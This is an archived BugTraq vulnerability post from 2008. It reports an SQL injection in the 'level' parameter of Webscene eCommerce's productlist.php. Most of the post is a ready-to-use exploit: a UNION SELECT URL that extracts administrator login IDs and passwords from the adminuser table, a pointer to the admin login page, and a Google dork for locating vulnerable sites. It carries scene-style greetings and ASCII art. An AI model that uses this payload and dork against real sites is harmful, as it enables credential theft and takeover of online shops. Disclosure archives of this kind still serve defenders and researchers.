BugTraq
Webscene eCommerce (level) Remote Sql Injection Oct 14 2008 04:29PM
angel ch4ng cc
########################################################################
#########

#

# Webscene eCommerce (level) Remote Sql Injection

#

# vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.h
tm

#

########################################################################
#########

#

#

# Bug Found By :Angela Chang (14-10-2008)

#

# contact: angel[at]ch4ng.cc

#

#

########################################################################
########

#

#

# Greetz: nyubi & Vrs-Chk

#

#

########################################################################
#######

vuln file : productlist.php

Input passed to the "level" is not properly verified

before being used. This can be exploited to execute

remote sql injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]

http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--

Login admin : http://somehost/admin/

Google dork : inurl:productlist.php?categoryid= level

########################################################################

__ _ _ _ __ _

__ _ _ _ / _` | ___ | | __ _ o O O __ | |_ __ _ _ _ / _` |

/ _` | | ' \ \__, | / -_) | | / _` | o / _| | ' \ / _` | | ' \ \__, |

\__,_| |_||_| |___/ \___| _|_|_ \__,_| TS__[O] \__|_ |_||_| \__,_| |_||_| |___/

_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|

"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-
'"`-0-0-'"`-0-0-'"`-0-0-'

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus